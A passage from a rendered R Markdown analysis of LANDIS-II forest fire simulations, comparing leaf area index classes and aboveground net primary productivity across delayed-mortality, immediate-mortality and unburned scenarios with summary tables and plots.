ND<-IntoClasses[IntoClasses$model=="No Delay",]
unique(Delay$name)
```
## [1] " Pre-burn" " Post-burn" " 5 yrs Post-burn" "10 yrs Post-burn"
``` r
ND_Pre<-as.data.frame(table(ND$group[ND$name==" Pre-burn"]))
s<-sum(ND_Pre[,2])
ND_Pre<-as.data.frame(table(ND$group[ND$name==" Pre-burn"])/s)
ND_Post<-as.data.frame(table(ND$group[ND$name==" Post-burn"])/s)
ND_5<-as.data.frame(table(ND$group[ND$name==" 5 yrs Post-burn"])/s)
ND_10<-as.data.frame(table(ND$group[ND$name=="10 yrs Post-burn"])/s)
Und<-IntoClasses[IntoClasses$model=="Undisturbed",]
unique(Delay$name)
```
## [1] " Pre-burn" " Post-burn" " 5 yrs Post-burn" "10 yrs Post-burn"
``` r
Und_Pre<-as.data.frame(table(Und$group[Und$name==" Pre-burn"]))
s<-sum(Und_Pre[,2])
Und_Pre<-as.data.frame(table(Und$group[Und$name==" Pre-burn"])/s)
Und_Post<-as.data.frame(table(Und$group[Und$name==" Post-burn"])/s)
Und_5<-as.data.frame(table(Und$group[Und$name==" 5 yrs Post-burn"])/s)
Und_10<-as.data.frame(table(Und$group[Und$name=="10 yrs Post-burn"])/s)
print(cbind(D_Pre,ND_Pre,(D_Pre$Freq-ND_Pre$Freq)/(ND_Pre$Freq)))
```
## Var1 Freq Var1 Freq (D_Pre$Freq - ND_Pre$Freq)/(ND_Pre$Freq)
## 1 0-2 0.08602404 0-2 0.09579158 -0.10196662
## 2 2-4 0.11862676 2-4 0.13523046 -0.12278079
## 3 4-6 0.22656925 4-6 0.23911824 -0.05248025
## 4 6-8 0.35972975 6-8 0.36593186 -0.01694882
## 5 >8 0.20905020 >8 0.16392786 0.27525733
``` r
print(cbind(D_Post,ND_Post,(D_Post$Freq-ND_Post$Freq)/(ND_Post$Freq)))
```
## Var1 Freq Var1 Freq (D_Post$Freq - ND_Post$Freq)/(ND_Post$Freq)
## 1 0-2 0.09395868 0-2 0.05883768 0.596913482
## 2 2-4 0.20661482 2-4 0.14949900 0.382048170
## 3 4-6 0.33537591 4-6 0.33458918 0.002351346
## 4 6-8 0.26820646 6-8 0.34412826 -0.220620648
## 5 >8 0.05027889 >8 0.08577154 -0.413804522
``` r
print(cbind(D_5,ND_5,(D_5$Freq-ND_5$Freq)/(ND_5$Freq)))
```
## Var1 Freq Var1 Freq (D_5$Freq - ND_5$Freq)/(ND_5$Freq)
## 1 0-2 0.0346453 0-2 0.02276553 0.52183132
## 2 2-4 0.0945086 2-4 0.05683367 0.66289819
## 3 4-6 0.2644355 4-6 0.20913828 0.26440528
## 4 6-8 0.4239139 6-8 0.44985972 -0.05767536
## 5 >8 0.1670202 >8 0.25643287 -0.34867869
``` r
print(cbind(D_10,ND_10,(D_10$Freq-ND_10$Freq)/(ND_10$Freq)))
```
## Var1 Freq Var1 Freq (D_10$Freq - ND_10$Freq)/(ND_10$Freq)
## 1 0-2 0.01924739 0-2 0.01234469 0.55916340
## 2 2-4 0.04556524 2-4 0.02557114 0.78190103
## 3 4-6 0.15625737 4-6 0.10869739 0.43754471
## 4 6-8 0.40985152 6-8 0.37931864 0.08049402
## 5 >8 0.36695734 >8 0.47855711 -0.23320053
``` r
par(mfrow=c(4,2))
par(mar=c(5.1, 7.1, 4.1, 6.1))
barplot(D_Pre$Freq*100,names.arg=D_Pre$Var1,main="\nDelayed Mortality \nPre Fire",ylim=c(0,50),col=Greens,cex.lab=3.0,cex.axis=2.5,cex.main=2.5,cex.names=2.5,
ylab="Percent Sites")
#mtext('text is here', side=1, line=3.5, at=9)
barplot(ND_Pre$Freq*100,names.arg=D_Pre$Var1,main="\nImmediate Mortality \nPre Fire",ylim=c(0,50),col=Greens,cex.lab=3.0,cex.axis=2.5,cex.main=2.5,cex.names=2.5)
# barplot(Und_Pre$Freq,names.arg=D_Pre$Var1,main="\nLandscape \nPre Fire",ylim=c(0,.5),col=Greens,cex.lab=1.7,cex.axis=1.7,cex.main=2.0,cex.names=1.7)
barplot(D_Post$Freq*100,names.arg=D_Pre$Var1,main="Post Fire",ylim=c(0,50),col=Greens,cex.lab=3.0,cex.axis=2.5,cex.main=2.5,cex.names=2.5, ylab="Percent Sites")
barplot(ND_Post$Freq*100,names.arg=D_Pre$Var1,main="Post Fire",ylim=c(0,50),col=Greens,cex.lab=3.0,cex.axis=2.5,cex.main=2.5,cex.names=2.5)
# barplot(Und_Post$Freq,names.arg=D_Pre$Var1,main="Post Fire",ylim=c(0,.5),col=Greens,cex.lab=1.7,cex.axis=1.7,cex.main=2.0,cex.names=1.7)
barplot(D_5$Freq*100,names.arg=D_Pre$Var1,main="5-Years Post Fire",ylim=c(0,50),col=Greens,cex.lab=3.0,cex.axis=2.5,cex.main=2.5,cex.names=2.5,
ylab="Percent Sites")
barplot(ND_5$Freq*100,names.arg=D_Pre$Var1,main="5-Years Post Fire",ylim=c(0,50),col=Greens,cex.lab=3.0,cex.axis=2.5,cex.main=2.5,cex.names=2.5)
# barplot(Und_5$Freq,names.arg=D_Pre$Var1,main="5-Years Post Fire",ylim=c(0,.5),col=Greens,cex.lab=1.7,cex.axis=1.7,cex.main=2.0,cex.names=1.7)
barplot(D_10$Freq*100,names.arg=D_Pre$Var1,main="10-Years Post Fire",ylim=c(0,50),col=Greens,cex.lab=3.0,cex.axis=2.5,cex.main=2.5,cex.names=2.5,
ylab="Percent Sites",xlab="LAI")
barplot(ND_10$Freq*100,names.arg=D_Pre$Var1,main="10-Years Post Fire",ylim=c(0,50),col=Greens,cex.lab=3.0,cex.axis=2.5,cex.main=2.5,cex.names=2.5,
xlab="LAI")
```
<!-- -->
``` r
# barplot(Und_10$Freq,names.arg=D_Pre$Var1,main="10-Years Post Fire",ylim=c(0,.5),col=Greens,cex.lab=1.7,cex.axis=1.7,cex.main=2.0,cex.names=1.7,
# xlab="LAI")
```
### Calculating ANPP
``` r
ProcessAG_NPP<-function(t,LANDIS_Inputs){
Fire1<-raster(paste0(LANDIS_Inputs,'scrapple-fire/ignition-type-',t,'.img'))
Fire1[Fire1<=1]<-NA
Fire1[Fire1>1]<-1
AG_NPPTOF<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',as.character(t-1),'.img'))*Fire1
#plot(AG_NPPTOF)
AG_NPPTOF<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',as.character(t-1),'.img'))*Fire1
AG_NPPAF<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',t,'.img'))*Fire1
AG_NPP10YAF<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',as.character(t+10),'.img'))*Fire1
AG_NPP20YAR<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',t+20,'.img'))*Fire1
AG_NPP30YAR<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',t+30,'.img'))*Fire1
AG_NPP40YAR<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',t+40,'.img'))*Fire1
values0<-as.data.frame(AG_NPPTOF$layer)%>%subset(!is.na(layer))
values1<-as.data.frame(AG_NPPAF$layer)%>%subset(!is.na(layer))
values2<-as.data.frame(AG_NPP10YAF$layer)%>%subset(!is.na(layer))
values3<-as.data.frame(AG_NPP20YAR$layer)%>%subset(!is.na(layer))
values4<-as.data.frame(AG_NPP30YAR$layer)%>%subset(!is.na(layer))
values5<-as.data.frame(AG_NPP40YAR$layer)%>%subset(!is.na(layer))
#values4<-as.data.frame(AG_NPP4$layer)%>%subset(!is.na(layer))
#values5<-as.data.frame(AG_NPP5$layer)%>%subset(!is.na(layer))
delta<-AG_NPPAF-AG_NPPTOF
#par(bg="grey")
# plot(delta,ylim=c(0,400),xlim=c(0,400),col=rdbu,zlim=c(-3000,3000),colNA="darkgrey")
data<-data.frame(name=c(rep(" Pre-burn",1),rep(" Post-burn",1),rep("10 yrs Post-burn",1),rep("20 yrs Post-burn",1),rep("30 yrs Post-burn",1),
rep("40 yrs Post-burn",1)),
value=c(mean(values0$layer),mean(values1$layer),mean(values2$layer),mean(values3$layer),mean(values4$layer),mean(values5$layer)))
return(data)
}
ProcessAG_NPPNF<-function(t,LANDIS_Inputs){
Fire1<-raster(paste0(LANDIS_Inputs,'scrapple-fire/ignition-type-',t,'.img'))
#plot(Fire1,ylim=c(0,400),xlim=c(0,400))
Fire1[Fire1!=1]<-NA
AG_NPPTOF<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',as.character(t-1),'.img'))*Fire1
AG_NPPAF<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',t,'.img'))*Fire1
AG_NPP10YAF<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',t+10,'.img'))*Fire1
AG_NPP20YAR<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',t+20,'.img'))*Fire1
AG_NPP30YAR<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',t+30,'.img'))*Fire1
AG_NPP40YAR<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',t+40,'.img'))*Fire1
values0<-as.data.frame(AG_NPPTOF$layer)%>%subset(!is.na(layer))
values1<-as.data.frame(AG_NPPAF$layer)%>%subset(!is.na(layer))
values2<-as.data.frame(AG_NPP10YAF$layer)%>%subset(!is.na(layer))
values3<-as.data.frame(AG_NPP20YAR$layer)%>%subset(!is.na(layer))
values4<-as.data.frame(AG_NPP30YAR$layer)%>%subset(!is.na(layer))
values5<-as.data.frame(AG_NPP40YAR$layer)%>%subset(!is.na(layer))
#values5<-as.data.frame(AG_NPP5$layer)%>%subset(!is.na(layer))
#par(bg="grey")
#plot(delta,ylim=c(0,400),xlim=c(0,400),col=rdbu,zlim=c(-3000,3000),colNA="darkgrey")
data<-data.frame(name=c(rep(" Pre-burn",1),rep(" Post-burn",1),rep("10 yrs Post-burn",1),rep("20 yrs Post-burn",1),rep("30 yrs Post-burn",1),
rep("40 yrs Post-burn",1)),
value=c(mean(values0$layer),mean(values1$layer),mean(values2$layer),mean(values3$layer),mean(values4$layer),mean(values5$layer)))
return(data)
}
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_D1_R2/"
LANDIS_Inputs2<-"E:/DM_runs_4_4/GA_Model_D2_R2/"
LANDIS_Inputs3<-"E:/DM_runs_4_4/GA_Model_D3_R2/"
LANDIS_Inputs4<-"E:/DM_runs_4_4/GA_Model_D4_R2/"
LANDIS_Inputs5<-"E:/DM_runs_4_4/GA_Model_D5_R2/"
mod1Year2<-ProcessAG_NPP(2,LANDIS_Inputs)
mod1Year3<-ProcessAG_NPP(3,LANDIS_Inputs)
mod1Year4<-ProcessAG_NPP(4,LANDIS_Inputs)
mod1Year5<-ProcessAG_NPP(5,LANDIS_Inputs)
mod1Year6<-ProcessAG_NPP(6,LANDIS_Inputs)
mod1Year7<-ProcessAG_NPP(7,LANDIS_Inputs)
mod1Year8<-ProcessAG_NPP(8,LANDIS_Inputs)
mod1Year9<-ProcessAG_NPP(9,LANDIS_Inputs)
mod1Year10<-ProcessAG_NPP(10,LANDIS_Inputs)
mod1Year11<-ProcessAG_NPP(11,LANDIS_Inputs)
mod2Year2<-ProcessAG_NPP(2,LANDIS_Inputs2)
mod2Year3<-ProcessAG_NPP(3,LANDIS_Inputs2)
mod2Year4<-ProcessAG_NPP(4,LANDIS_Inputs2)
mod2Year5<-ProcessAG_NPP(5,LANDIS_Inputs2)
mod2Year6<-ProcessAG_NPP(6,LANDIS_Inputs2)
mod2Year7<-ProcessAG_NPP(7,LANDIS_Inputs2)
mod2Year8<-ProcessAG_NPP(8,LANDIS_Inputs2)
mod2Year9<-ProcessAG_NPP(9,LANDIS_Inputs2)
mod2Year10<-ProcessAG_NPP(10,LANDIS_Inputs2)
mod2Year11<-ProcessAG_NPP(11,LANDIS_Inputs2)
mod3Year2<-ProcessAG_NPP(2,LANDIS_Inputs3)
mod3Year3<-ProcessAG_NPP(3,LANDIS_Inputs3)
mod3Year4<-ProcessAG_NPP(4,LANDIS_Inputs3)
mod3Year5<-ProcessAG_NPP(5,LANDIS_Inputs3)
mod3Year6<-ProcessAG_NPP(6,LANDIS_Inputs3)
mod3Year7<-ProcessAG_NPP(7,LANDIS_Inputs3)
mod3Year8<-ProcessAG_NPP(8,LANDIS_Inputs3)
mod3Year9<-ProcessAG_NPP(9,LANDIS_Inputs3)
mod3Year10<-ProcessAG_NPP(10,LANDIS_Inputs3)
mod3Year11<-ProcessAG_NPP(11,LANDIS_Inputs3)
mod4Year2<-ProcessAG_NPP(2,LANDIS_Inputs4)
mod4Year3<-ProcessAG_NPP(3,LANDIS_Inputs4)
mod4Year4<-ProcessAG_NPP(4,LANDIS_Inputs4)
mod4Year5<-ProcessAG_NPP(5,LANDIS_Inputs4)
mod4Year6<-ProcessAG_NPP(6,LANDIS_Inputs4)
mod4Year7<-ProcessAG_NPP(7,LANDIS_Inputs4)
mod4Year8<-ProcessAG_NPP(8,LANDIS_Inputs4)
mod4Year9<-ProcessAG_NPP(9,LANDIS_Inputs4)
mod4Year10<-ProcessAG_NPP(10,LANDIS_Inputs4)
mod4Year11<-ProcessAG_NPP(11,LANDIS_Inputs4)
mod5Year2<-ProcessAG_NPP(2,LANDIS_Inputs5)
mod5Year3<-ProcessAG_NPP(3,LANDIS_Inputs5)
mod5Year4<-ProcessAG_NPP(4,LANDIS_Inputs5)
mod5Year5<-ProcessAG_NPP(5,LANDIS_Inputs5)
mod5Year6<-ProcessAG_NPP(6,LANDIS_Inputs5)
mod5Year7<-ProcessAG_NPP(7,LANDIS_Inputs5)
mod5Year8<-ProcessAG_NPP(8,LANDIS_Inputs5)
mod5Year9<-ProcessAG_NPP(9,LANDIS_Inputs5)
mod5Year10<-ProcessAG_NPP(10,LANDIS_Inputs5)
mod5Year11<-ProcessAG_NPP(11,LANDIS_Inputs5)
Stack_D<-rbind(mod1Year2,mod1Year3,mod1Year4,mod1Year5,mod1Year6,
mod1Year7,mod1Year8,mod1Year9,mod1Year10,mod1Year11,
mod2Year2,mod2Year3,mod2Year4,mod2Year5,mod2Year6,
mod2Year7,mod2Year8,mod2Year9,mod2Year10,mod2Year11,
mod3Year2,mod3Year3,mod3Year4,mod3Year5,mod3Year6,
mod3Year7,mod3Year8,mod3Year9,mod3Year10,mod3Year11,
mod4Year2,mod4Year3,mod4Year4,mod4Year5,mod4Year6,
mod4Year7,mod4Year8,mod4Year9,mod4Year10,mod4Year11,
mod5Year2,mod5Year3,mod5Year4,mod5Year5,mod5Year6,
mod5Year7,mod5Year8,mod5Year9,mod5Year10,mod5Year11)
Stack_D$model<-"Delay"
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_ND1_R2/"
LANDIS_Inputs2<-"E:/DM_runs_4_4/GA_Model_ND2_R2/"
LANDIS_Inputs3<-"E:/DM_runs_4_4/GA_Model_ND3_R2/"
LANDIS_Inputs4<-"E:/DM_runs_4_4/GA_Model_ND4_R2/"
LANDIS_Inputs5<-"E:/DM_runs_4_4/GA_Model_ND5_R2/"
mod1Year2<-ProcessAG_NPP(2,LANDIS_Inputs)
mod1Year3<-ProcessAG_NPP(3,LANDIS_Inputs)
mod1Year4<-ProcessAG_NPP(4,LANDIS_Inputs)
mod1Year5<-ProcessAG_NPP(5,LANDIS_Inputs)
mod1Year6<-ProcessAG_NPP(6,LANDIS_Inputs)
mod1Year7<-ProcessAG_NPP(7,LANDIS_Inputs)
mod1Year8<-ProcessAG_NPP(8,LANDIS_Inputs)
mod1Year9<-ProcessAG_NPP(9,LANDIS_Inputs)
mod1Year10<-ProcessAG_NPP(10,LANDIS_Inputs)
mod1Year11<-ProcessAG_NPP(11,LANDIS_Inputs)
mod2Year2<-ProcessAG_NPP(2,LANDIS_Inputs2)
mod2Year3<-ProcessAG_NPP(3,LANDIS_Inputs2)
mod2Year4<-ProcessAG_NPP(4,LANDIS_Inputs2)
mod2Year5<-ProcessAG_NPP(5,LANDIS_Inputs2)
mod2Year6<-ProcessAG_NPP(6,LANDIS_Inputs2)
mod2Year7<-ProcessAG_NPP(7,LANDIS_Inputs2)
mod2Year8<-ProcessAG_NPP(8,LANDIS_Inputs2)
mod2Year9<-ProcessAG_NPP(9,LANDIS_Inputs2)
mod2Year10<-ProcessAG_NPP(10,LANDIS_Inputs2)
mod2Year11<-ProcessAG_NPP(11,LANDIS_Inputs2)
mod3Year2<-ProcessAG_NPP(2,LANDIS_Inputs3)
mod3Year3<-ProcessAG_NPP(3,LANDIS_Inputs3)
mod3Year4<-ProcessAG_NPP(4,LANDIS_Inputs3)
mod3Year5<-ProcessAG_NPP(5,LANDIS_Inputs3)
mod3Year6<-ProcessAG_NPP(6,LANDIS_Inputs3)
mod3Year7<-ProcessAG_NPP(7,LANDIS_Inputs3)
mod3Year8<-ProcessAG_NPP(8,LANDIS_Inputs3)
mod3Year9<-ProcessAG_NPP(9,LANDIS_Inputs3)
mod3Year10<-ProcessAG_NPP(10,LANDIS_Inputs3)
mod3Year11<-ProcessAG_NPP(11,LANDIS_Inputs3)
mod4Year2<-ProcessAG_NPP(2,LANDIS_Inputs4)
mod4Year3<-ProcessAG_NPP(3,LANDIS_Inputs4)
mod4Year4<-ProcessAG_NPP(4,LANDIS_Inputs4)
mod4Year5<-ProcessAG_NPP(5,LANDIS_Inputs4)
mod4Year6<-ProcessAG_NPP(6,LANDIS_Inputs4)
mod4Year7<-ProcessAG_NPP(7,LANDIS_Inputs4)
mod4Year8<-ProcessAG_NPP(8,LANDIS_Inputs4)
mod4Year9<-ProcessAG_NPP(9,LANDIS_Inputs4)
mod4Year10<-ProcessAG_NPP(10,LANDIS_Inputs4)
mod4Year11<-ProcessAG_NPP(11,LANDIS_Inputs4)
mod5Year2<-ProcessAG_NPP(2,LANDIS_Inputs5)
mod5Year3<-ProcessAG_NPP(3,LANDIS_Inputs5)
mod5Year4<-ProcessAG_NPP(4,LANDIS_Inputs5)
mod5Year5<-ProcessAG_NPP(5,LANDIS_Inputs5)
mod5Year6<-ProcessAG_NPP(6,LANDIS_Inputs5)
mod5Year7<-ProcessAG_NPP(7,LANDIS_Inputs5)
mod5Year8<-ProcessAG_NPP(8,LANDIS_Inputs5)
mod5Year9<-ProcessAG_NPP(9,LANDIS_Inputs5)
mod5Year10<-ProcessAG_NPP(10,LANDIS_Inputs5)
mod5Year11<-ProcessAG_NPP(11,LANDIS_Inputs5)
Stack_ND<-rbind(mod1Year2,mod1Year3,mod1Year4,mod1Year5,mod1Year6,
mod1Year7,mod1Year8,mod1Year9,mod1Year10,mod1Year11,
mod2Year2,mod2Year3,mod2Year4,mod2Year5,mod2Year6,
mod2Year7,mod2Year8,mod2Year9,mod2Year10,mod2Year11,
mod3Year2,mod3Year3,mod3Year4,mod3Year5,mod3Year6,
mod3Year7,mod3Year8,mod3Year9,mod3Year10,mod3Year11,
mod4Year2,mod4Year3,mod4Year4,mod4Year5,mod4Year6,
mod4Year7,mod4Year8,mod4Year9,mod4Year10,mod4Year11,
mod5Year2,mod5Year3,mod5Year4,mod5Year5,mod5Year6,
mod5Year7,mod5Year8,mod5Year9,mod5Year10,mod5Year11)
Stack_ND$model<-"No Delay"
mod1Year2<-ProcessAG_NPPNF(2,LANDIS_Inputs)
mod1Year3<-ProcessAG_NPPNF(3,LANDIS_Inputs)
mod1Year4<-ProcessAG_NPPNF(4,LANDIS_Inputs)
mod1Year5<-ProcessAG_NPPNF(5,LANDIS_Inputs)
mod1Year6<-ProcessAG_NPPNF(6,LANDIS_Inputs)
mod1Year7<-ProcessAG_NPPNF(7,LANDIS_Inputs)
mod1Year8<-ProcessAG_NPPNF(8,LANDIS_Inputs)
mod1Year9<-ProcessAG_NPPNF(9,LANDIS_Inputs)
mod1Year10<-ProcessAG_NPPNF(10,LANDIS_Inputs)
mod1Year11<-ProcessAG_NPPNF(11,LANDIS_Inputs)
mod2Year2<-ProcessAG_NPPNF(2,LANDIS_Inputs2)
mod2Year3<-ProcessAG_NPPNF(3,LANDIS_Inputs2)
mod2Year4<-ProcessAG_NPPNF(4,LANDIS_Inputs2)
mod2Year5<-ProcessAG_NPPNF(5,LANDIS_Inputs2)
mod2Year6<-ProcessAG_NPPNF(6,LANDIS_Inputs2)
mod2Year7<-ProcessAG_NPPNF(7,LANDIS_Inputs2)
mod2Year8<-ProcessAG_NPPNF(8,LANDIS_Inputs2)
mod2Year9<-ProcessAG_NPPNF(9,LANDIS_Inputs2)
mod2Year10<-ProcessAG_NPPNF(10,LANDIS_Inputs2)
mod2Year11<-ProcessAG_NPPNF(11,LANDIS_Inputs2)
mod3Year2<-ProcessAG_NPPNF(2,LANDIS_Inputs3)
mod3Year3<-ProcessAG_NPPNF(3,LANDIS_Inputs3)
mod3Year4<-ProcessAG_NPPNF(4,LANDIS_Inputs3)
mod3Year5<-ProcessAG_NPPNF(5,LANDIS_Inputs3)
mod3Year6<-ProcessAG_NPPNF(6,LANDIS_Inputs3)
mod3Year7<-ProcessAG_NPPNF(7,LANDIS_Inputs3)
mod3Year8<-ProcessAG_NPPNF(8,LANDIS_Inputs3)
mod3Year9<-ProcessAG_NPPNF(9,LANDIS_Inputs3)
mod3Year10<-ProcessAG_NPPNF(10,LANDIS_Inputs3)
mod3Year11<-ProcessAG_NPPNF(11,LANDIS_Inputs3)
mod4Year2<-ProcessAG_NPPNF(2,LANDIS_Inputs4)
mod4Year3<-ProcessAG_NPPNF(3,LANDIS_Inputs4)
mod4Year4<-ProcessAG_NPPNF(4,LANDIS_Inputs4)
mod4Year5<-ProcessAG_NPPNF(5,LANDIS_Inputs4)
mod4Year6<-ProcessAG_NPPNF(6,LANDIS_Inputs4)
mod4Year7<-ProcessAG_NPPNF(7,LANDIS_Inputs4)
mod4Year8<-ProcessAG_NPPNF(8,LANDIS_Inputs4)
mod4Year9<-ProcessAG_NPPNF(9,LANDIS_Inputs4)
mod4Year10<-ProcessAG_NPPNF(10,LANDIS_Inputs4)
mod4Year11<-ProcessAG_NPPNF(11,LANDIS_Inputs4)
mod5Year2<-ProcessAG_NPPNF(2,LANDIS_Inputs5)
mod5Year3<-ProcessAG_NPPNF(3,LANDIS_Inputs5)
mod5Year4<-ProcessAG_NPPNF(4,LANDIS_Inputs5)
mod5Year5<-ProcessAG_NPPNF(5,LANDIS_Inputs5)
mod5Year6<-ProcessAG_NPPNF(6,LANDIS_Inputs5)
mod5Year7<-ProcessAG_NPPNF(7,LANDIS_Inputs5)
mod5Year8<-ProcessAG_NPPNF(8,LANDIS_Inputs5)
mod5Year9<-ProcessAG_NPPNF(9,LANDIS_Inputs5)
mod5Year10<-ProcessAG_NPPNF(10,LANDIS_Inputs5)
mod5Year11<-ProcessAG_NPPNF(11,LANDIS_Inputs5)
Stack_C<-rbind(mod1Year2,mod1Year3,mod1Year4,mod1Year5,mod1Year6,
mod1Year7,mod1Year8,mod1Year9,mod1Year10,mod1Year11,
mod2Year2,mod2Year3,mod2Year4,mod2Year5,mod2Year6,
mod2Year7,mod2Year8,mod2Year9,mod2Year10,mod2Year11,
mod3Year2,mod3Year3,mod3Year4,mod3Year5,mod3Year6,
mod3Year7,mod3Year8,mod3Year9,mod3Year10,mod3Year11,
mod4Year2,mod4Year3,mod4Year4,mod4Year5,mod4Year6,
mod4Year7,mod4Year8,mod4Year9,mod4Year10,mod4Year11,
mod5Year2,mod5Year3,mod5Year4,mod5Year5,mod5Year6,
mod5Year7,mod5Year8,mod5Year9,mod5Year10,mod5Year11)
Stack_C$model<-"Undisturbed"
Stack_D$value[Stack_D$name=="10 yrs Post-burn"]
boxplot(Stack_D$value[Stack_D$name=="20 yrs Post-burn"],Stack_ND$value[Stack_ND$name=="20 yrs Post-burn"])
NPPStack<-rbind(Stack_D,Stack_ND,Stack_C)
write.csv(NPPStack,"NPPStack_4_28_years.csv")
```
``` r
NPPStack<-read.csv("NPPStack_4_28_years.csv")
unique(NPPStack$name)
```
## [1] " Pre-burn" " Post-burn" "10 yrs Post-burn" "20 yrs Post-burn"
## [5] "30 yrs Post-burn" "40 yrs Post-burn"
``` r
summary(NPPStack$value[NPPStack$model=="Delay"& NPPStack$name==" Post-burn"])
```
## Min. 1st Qu. Median Mean 3rd Qu. Max.
## 488.4 703.3 778.3 773.5 851.3 971.8
``` r
summary(NPPStack$value[NPPStack$model=="No Delay"& NPPStack$name==" Post-burn"])
```
## Min. 1st Qu. Median Mean 3rd Qu. Max.
## 593.9 769.5 848.5 829.5 902.8 1082.2
``` r
summary(NPPStack$value[NPPStack$model=="Undisturbed"& NPPStack$name==" Post-burn"])
```
## Min. 1st Qu. Median Mean 3rd Qu. Max.
## 761.7 889.7 960.3 944.4 1009.3 1093.0
``` r
summary(NPPStack$value[NPPStack$model=="Delay"& NPPStack$name=="10 yrs Post-burn"])
```
## Min. 1st Qu. Median Mean 3rd Qu. Max.
## 550.2 728.7 782.4 783.3 840.3 1002.6
``` r
summary(NPPStack$value[NPPStack$model=="No Delay"& NPPStack$name=="10 yrs Post-burn"])
```
## Min. 1st Qu. Median Mean 3rd Qu. Max.
## 645.9 736.4 844.3 817.1 882.7 941.6
``` r
summary(NPPStack$value[NPPStack$model=="Undisturbed"& NPPStack$name=="10 yrs Post-burn"])
```
## Min. 1st Qu. Median Mean 3rd Qu. Max.
## 747.1 813.7 916.8 895.4 946.8 1031.1
``` r
summary(NPPStack$value[NPPStack$model=="Delay"& NPPStack$name=="20 yrs Post-burn"])
```
## Min. 1st Qu. Median Mean 3rd Qu. Max.
## 610.1 732.2 814.8 808.8 888.7 936.4
``` r
summary(NPPStack$value[NPPStack$model=="No Delay"& NPPStack$name=="20 yrs Post-burn"])
```
## Min. 1st Qu. Median Mean 3rd Qu. Max.
## 599.7 822.5 866.7 857.3 909.6 979.2
``` r
summary(NPPStack$value[NPPStack$model=="Undisturbed"& NPPStack$name=="20 yrs Post-burn"])
```
## Min. 1st Qu. Median Mean 3rd Qu. Max.
## 751.1 908.5 939.5 931.7 969.2 1038.7
``` r
summary(NPPStack$value[NPPStack$model=="Delay"& NPPStack$name=="30 yrs Post-burn"])
```
## Min. 1st Qu. Median Mean 3rd Qu. Max.
## 620.4 747.5 852.6 832.8 923.0 1046.6
``` r
summary(NPPStack$value[NPPStack$model=="No Delay"& NPPStack$name=="30 yrs Post-burn"])
```
## Min. 1st Qu. Median Mean 3rd Qu. Max.
## 612.8 797.1 887.7 862.5 932.6 1088.5
``` r
summary(NPPStack$value[NPPStack$model=="Undisturbed"& NPPStack$name=="30 yrs Post-burn"])
```
## Min. 1st Qu. Median Mean 3rd Qu. Max.
## 754.3 835.3 953.2 930.4 1005.9 1069.3
``` r
summary(NPPStack$value[NPPStack$model=="Delay"& NPPStack$name=="40 yrs Post-burn"])
```
## Min. 1st Qu. Median Mean 3rd Qu. Max.
## 608.8 810.0 897.3 881.3 963.4 1053.1
``` r
summary(NPPStack$value[NPPStack$model=="No Delay"& NPPStack$name=="40 yrs Post-burn"])
```
## Min. 1st Qu. Median Mean 3rd Qu. Max.
## 698.9 818.1 872.5 881.9 947.0 1134.5
``` r
summary(NPPStack$value[NPPStack$model=="Undisturbed"& NPPStack$name=="40 yrs Post-burn"])
```
## Min. 1st Qu. Median Mean 3rd Qu. Max.
## 778.6 897.0 984.7 962.4 1013.2 1124.3
``` r
NPPStack$model[NPPStack$model=="No Delay"]<-"Immediate"
NPPStack$model[NPPStack$model=="Undisturbed"]<-"Unburned"
NPPStack$model[NPPStack$model=="Delay"]<-"Delayed"
```
``` r
label.df <- data.frame(Group = c("Preburn"),
Value = c(1200))
#my_comparisons <- list( c("Delayed", "Immediate"))
unique(NPPStack$model)
```
## [1] "Delayed" "Immediate" "Unburned"
``` r
NPPStack$value100<-NPPStack$value/100
p1 <- ggboxplot(NPPStack, x="model", y="value100", facet.by="name") +
stat_compare_means(
comparisons = list(c("Delayed", "Immediate"),c("Delayed", "Unburned"),c("Immediate", "Unburned")
),
label = "p.signif",size=5.0)+
ylab("Above Ground NPP Mg/ha/year")+
xlab("")+
theme_classic(base_size = 16)
p1
```
<!-- -->
``` r
?ggsave()
```
## starting httpd help server ... done
``` r
#getwd()
ggsave('ANPP_Fig.png', p1,width = 10.0,height=10.0,dpi=200)
```
``` r
label.df <- data.frame(Group = c("Preburn"),
Value = c(1200))
#my_comparisons <- list( c("Delayed", "Immediate"))
unique(NPPStack$model)
```
## [1] "Delayed" "Immediate" "Unburned"
``` r
NPPStack$value100<-NPPStack$value/100
p1 <- ggboxplot(NPPStack, x="model", y="value100", facet.by="name") +
stat_compare_means(
comparisons = list(c("Delayed", "Immediate"),c("Delayed", "Unburned"),c("Immediate", "Unburned")
),size=5.0)+
ylab("Above Ground NPP Mg/ha/year")+
xlab("")+
theme_classic(base_size = 16)
p1
```
<!-- -->
``` r
Biomass<-"E:/DM_Runs_222/GA_Model_D1/Biomass/"
LANDIS_Inputs<-"E:/DM_Runs_222/GA_Model_D1/"
Firemaps<-function(LANDIS_Inputs,t){
Fire1<-raster(paste0(LANDIS_Inputs,'scrapple-fire/ignition-type-',t,'.img'))
FireOn<-Fire1
FireOn[FireOn<=1]<-NA
FireOn[FireOn>1]<-1
plot(FireOn,ylim=c(0,400),xlim=c(0,400))
FireOff<-Fire1
FireOff[FireOff!=1]<-NA
#plot(FireOff)
return(list(FireOn,FireOff))
}
Fire2<-Firemaps(LANDIS_Inputs,2)
FireOn<-Fire2[[1]]
FireOff<-Fire2[[2]]
plot(FireOn,col=Greens,ylim=c(0,400),xlim=c(0,400))
# AllStack<-stack(paste0(Biomass,list.files(Biomass,pattern = paste0("\\-",(t+10),".img$"))))
Bio_sum<-calc(AllStack,sum)
# AcerRubr_perc<-AllStack$AcerRubr.ageclass.12/Bio_sum
#QuerPrin_perc<-AllStack$ /Bio_sum
